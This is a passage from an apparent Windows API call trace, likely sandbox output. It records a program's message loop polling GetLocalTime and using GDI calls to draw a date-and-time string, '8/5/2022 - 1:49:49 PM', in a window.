[0118.752] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.752] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1ed)) [0118.752] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1ed)) [0118.752] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.763] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.763] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.763] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1f8)) [0118.763] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1f8)) [0118.763] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.784] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.784] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.784] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x20d)) [0118.784] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x20d)) [0118.784] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.829] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.829] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.829] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x23b)) [0118.830] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x23b)) [0118.830] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.840] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.840] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.840] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x245)) [0118.840] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x245)) [0118.840] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.860] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.860] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.860] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x259)) [0118.860] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x259)) [0118.860] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.871] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.871] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.871] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x264)) [0118.871] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x264)) [0118.871] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.892] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.892] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.892] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x279)) [0118.892] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x279)) [0118.892] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.903] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.903] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.903] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x284)) [0118.903] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x284)) [0118.903] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.925] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.925] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.925] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x29a)) [0118.925] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x29a)) [0118.925] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.936] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.936] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.936] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2a5)) [0118.936] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2a5)) [0118.936] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.957] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.957] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.957] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2ba)) [0118.957] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2ba)) [0118.957] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.974] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.974] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.974] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2cb)) [0118.974] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2cb)) [0118.974] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.983] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.983] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.983] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2d4)) [0118.983] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2d4)) [0118.983] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.004] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.004] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.004] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2e9)) [0119.004] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2e9)) [0119.004] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.014] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.014] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.014] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2f3)) [0119.014] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x2f3)) [0119.014] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.035] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.035] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.035] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x308)) [0119.035] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x308)) [0119.035] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.046] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.046] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.046] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x313)) [0119.046] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x313)) [0119.046] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.057] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.057] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.057] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x31e)) [0119.057] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x31e)) [0119.057] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.079] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.079] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.079] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x334)) [0119.079] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x334)) [0119.079] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.089] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.089] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.089] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x33e)) [0119.089] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x33e)) [0119.089] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.109] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.109] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.109] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x352)) [0119.109] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x352)) [0119.109] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.120] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.120] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.120] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x35d)) [0119.120] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x35d)) [0119.120] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.142] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.142] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.142] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x373)) [0119.142] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x373)) [0119.142] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.153] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.153] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.153] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x37e)) [0119.153] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x37e)) [0119.153] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.175] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.175] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.175] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x394)) [0119.175] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x394)) [0119.175] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.185] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.185] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.185] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x39e)) [0119.185] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x39e)) [0119.185] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.207] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.207] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.207] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x3b4)) [0119.207] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x3b4)) [0119.207] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.217] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.217] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.217] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x3be)) [0119.217] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x3be)) [0119.217] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.237] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.237] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.237] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x3d2)) [0119.237] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x3d2)) [0119.237] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.248] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.248] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.248] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x3dd)) [0119.248] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x3dd)) [0119.248] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.270] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.270] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.270] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0xb)) [0119.270] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0xb)) [0119.270] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0119.270] GetDC (hWnd=0x0) returned 0xa0100d0 [0119.271] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0119.271] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0119.271] GetSysColor (nIndex=8) returned 0x0 [0119.271] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0119.271] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0119.271] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0119.271] UnrealizeObject (h=0x2d10099f) returned 1 [0119.271] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0119.271] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0119.271] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0119.271] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:49 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:49 PM", lprc=0x19f5bd) returned 13 [0119.272] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0119.272] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0119.272] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0119.272] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0119.272] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0119.272] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.280] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.280] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.280] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x15)) [0119.280] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x15)) [0119.280] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.301] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.301] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.301] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2a)) [0119.301] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2a)) [0119.301] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.312] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.312] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.312] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x35)) [0119.312] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, 